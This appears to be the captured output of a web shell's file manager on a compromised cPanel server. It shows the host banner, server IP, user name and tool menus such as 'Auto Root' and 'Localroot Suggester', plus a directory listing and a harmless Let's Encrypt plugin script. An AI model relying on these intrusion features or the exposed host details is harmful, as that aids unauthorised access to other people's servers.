Linux moon.hostseba.com 4.18.0-553.51.1.lve.el8.x86_64 #1 SMP Tue May 6 15:14:12 UTC 2025 x86_64
LiteSpeed
Server IP : 103.174.152.68 & Your IP : 216.73.216.121
Domains :
Cant Read [ /etc/named.conf ]
User : julaysp1
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
/
opt /
fleetssl-cpanel /
Delete
Unzip
Name
Size
Permission
Date
Action
DataTables-1.10.11
[ DIR ]
drwxr-xr-x
2023-11-26 04:30
status
[ DIR ]
drwxr-xr-x
2023-11-26 04:30
EULA
2.87
KB
-rw-r--r--
2023-02-09 06:22
FleetSSLProvider.pm
659
B
-rw-r--r--
2023-02-09 06:22
THIRD-PARTY
16.95
KB
-rw-r--r--
2023-02-09 06:22
bootstrap.min.css
97.62
KB
-rw-r--r--
2023-02-09 06:22
bootstrap.min.js
28.43
KB
-rw-r--r--
2023-02-09 06:22
datatables.min.css
13.72
KB
-rw-r--r--
2023-02-09 06:22
datatables.min.js
175.99
KB
-rw-r--r--
2023-02-09 06:22
dynamicui_letsencrypt.conf
254
B
-rw-r--r--
2023-02-09 06:22
fix_fleetssl_cpanel_0.19.5-upgrade.sh
275
B
-rwxr-xr-x
2023-02-09 06:22
get_proxy_names
340
B
-rwxr-xr-x
2023-02-09 06:22
index.html
140
B
-rw-r--r--
2023-02-09 06:22
install.json
328
B
-rw-r--r--
2023-02-09 06:22
jquery-1.12.4.min.js
94.89
KB
-rw-r--r--
2023-02-09 06:22
letsencrypt-cpanel-whm.conf
290
B
-rw-r--r--
2023-02-09 06:22
letsencrypt-cpanel-whm.jpg
1.31
KB
-rw-r--r--
2023-02-09 06:22
letsencrypt-cpanel-x3.png
1.57
KB
-rw-r--r--
2023-02-09 06:22
letsencrypt-cpanel.cpanelplugin
2.43
KB
-rw-r--r--
2023-02-09 06:22
letsencrypt-cpanel.png
1.52
KB
-rw-r--r--
2023-02-09 06:22
letsencrypt.chkservd
103
B
-rw-r--r--
2023-02-09 06:22
letsencrypt.live.cgi
12.66
MB
-rwxr-xr-x
2023-02-09 06:22
meta.json
55
B
-rw-r--r--
2023-02-09 06:22
post-install.sh
1.16
KB
-rw-r--r--
2023-02-09 06:22
pre-install.sh
1.98
KB
-rw-r--r--
2023-02-09 06:22
uninstall.sh
1.98
KB
-rw-r--r--
2023-02-09 06:22
vendor.en.ini
3.33
KB
-rw-r--r--
2023-02-09 06:22
vendor_email.en.ini
1.86
KB
-rw-r--r--
2023-02-09 06:22
vendor_error.html
493
B
-rw-r--r--
2023-02-09 06:22
vendor_home.html
5.2
KB
-rw-r--r--
2023-02-09 06:22
vendor_issue-reuse.html
1.06
KB
-rw-r--r--
2023-02-09 06:22
vendor_issue.html
6.26
KB
-rw-r--r--
2023-02-09 06:22
vendor_reinstall.html
1.93
KB
-rw-r--r--
2023-02-09 06:22
vendor_remove.html
630
B
-rw-r--r--
2023-02-09 06:22
vendor_result.html
249
B
-rw-r--r--
2023-02-09 06:22
vendor_settings.html
565
B
-rw-r--r--
2023-02-09 06:22
vendor_theme_paper_lantern_header.html
931
B
-rw-r--r--
2023-02-09 06:22
vendor_theme_x3_footer.html
145
B
-rw-r--r--
2023-02-09 06:22
vendor_theme_x3_header.html
210
B
-rw-r--r--
2023-02-09 06:22
vendor_view.html
2.27
KB
-rw-r--r--
2023-02-09 06:22
whm_home.html
4.35
KB
-rw-r--r--
2023-02-09 06:22
Save
Rename
<!-- this file is included at the top of the page if the theme is set to paper_lantern --> <script type='text/javascript'> function LetsEncrypt_DisableButtons() { var submit = $("input[type='submit']"); submit.attr('disabled', 'true'); submit.attr('value', 'Please wait...'); $("body").css({"cursor": "wait"}); return true; } document.addEventListener('DOMContentLoaded', function () { var methodChangeHandler = function () { document.querySelectorAll('.wildcard-checkbox').forEach(function (el) { switch(document.querySelector("input[name='challenge_method']:checked").value) { case "dns-01": el.disabled = false; break; case "http-01": el.checked = false; el.disabled = true; break; } }); }; document.querySelectorAll("input[name='challenge_method']").forEach(function (el) { el.addEventListener('click', methodChangeHandler); }); methodChangeHandler(); }); </script>